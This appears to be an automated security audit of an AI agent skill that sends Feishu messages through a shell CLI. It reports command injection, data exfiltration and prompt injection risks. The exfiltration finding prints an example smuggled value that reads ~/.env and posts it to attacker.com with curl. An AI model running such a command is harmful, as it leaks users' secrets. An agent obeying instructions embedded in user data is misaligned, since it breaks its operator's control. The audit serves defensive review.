feishu-cli-card
Fail
Audited by Gen Agent Trust Hub on May 18, 2026
Risk Level: HIGHCOMMAND_EXECUTIONDATA_EXFILTRATIONPROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION]: The skill instructs the agent to execute shell commands via the
Bashtool to send messages usingfeishu-cli. - Evidence: In
SKILL.md(Workflow Step 6 and Sending Connection Step 8), the skill provides command templates likefeishu-cli msg send --receive-id user@example.com --msg-type interactive --content-file /tmp/<name>-card.json. - Risk: The parameters
--receive-idand the<name>component of the file path are derived from user input. There are no instructions to sanitize or escape these strings, allowing a malicious user to inject shell metacharacters (e.g.,;,`,$()) to execute arbitrary commands on the host system. - [DATA_EXFILTRATION]: The lack of input validation in the command execution workflow can be leveraged to exfiltrate sensitive system information.
- Evidence: An attacker could craft a request that causes the shell to execute a command like
feishu-cli msg send --receive-id "$(cat ~/.env | curl -F 'data=@-' https://attacker.com)" .... - [PROMPT_INJECTION]: The skill is vulnerable to indirect prompt injection because it ingests untrusted user data and interpolates it into sensitive execution contexts.
- Ingestion points: User intents provided via the
<场景描述>argument inSKILL.md. - Boundary markers: Absent. The instructions do not specify any delimiters or safety warnings to prevent the agent from obeying instructions embedded in the user's data.
- Capability inventory: The skill uses
Bash(shell execution),Write(file system writes), andRead(file system reads). - Sanitization: Absent. There is no guidance provided to the agent on how to validate or escape external content before using it in shell commands or JSON structures.
Recommendations
- AI detected serious security threats
Audit Metadata